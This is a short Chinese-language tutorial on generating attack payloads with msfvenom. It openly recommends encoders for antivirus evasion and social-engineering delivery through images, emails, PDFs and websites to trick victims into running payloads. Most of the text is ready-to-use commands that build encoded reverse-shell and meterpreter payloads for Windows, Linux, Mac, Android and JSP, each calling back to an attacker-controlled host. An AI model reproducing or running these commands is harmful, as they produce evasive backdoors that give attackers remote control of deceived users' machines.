身份证
msfvenom 是 msfpayload 爸爸和 msfencode 妈妈生的仔仔,是两个的结合体,继承了两者的优良品德,生日是 2015 年 6 月 8 日,刚过不久…
用武之地
免杀 : msfvenom 结合 excellent 编码器等生成的 payload 具有一定的免杀效果
客户端渗透 : 在无法突破网络边界的情况下(IDS等)转而进行客户端的渗透,此法常见于社会工程学攻击,进而渗透到线上的业务网络,具体较常见的形式有:图片 邮件 PDF DOC WEB站点…诱骗人家下载执行 payload
msfvenom help
查看所有 payload :msfvenom --list payloads
查看所有 encoders :msfvenom --list encoders
[注:其中有两个 rank 为 excellent的:cmd/powershell_base64
和 x86/shikata_ga_nai
常用于免杀中]
…同理可查其它模块
各个平台制造
首先简单说明一下这些参数:
-p:payload
-a:适合架构
–platform:适合平台
-b: 去掉坏字符
-e:编码器
-i:加密次数
-f:生成格式
-o:输出到
是不是感觉很熟悉?没错,跟 payload 那一小节还是蛮像的
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.67.221 LPORT=8686 -a x86 --platform Windows -e x86/shikata_ga_nai -b "\x00" -f exe -o /root/0windows.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.67.221 LPORT=8686 -a x86 --platform Linux -f elf -o /root/0linux.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.67.211 LPORT=8686 -a x86 --platform osx -f macho -o /root/0mac.macho
Android
msfvenom -p android/meterpreter/reverse_tcp -a dalvik LHOST=192.168.67.221 LPORT=8686 -f raw -o /root/0android.apk
除此之外还可以生成各种脚本语言的反弹 shell:
比如 jsp:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.67.221 LPORT=8686 -f raw -o /root/0java.jsp
😄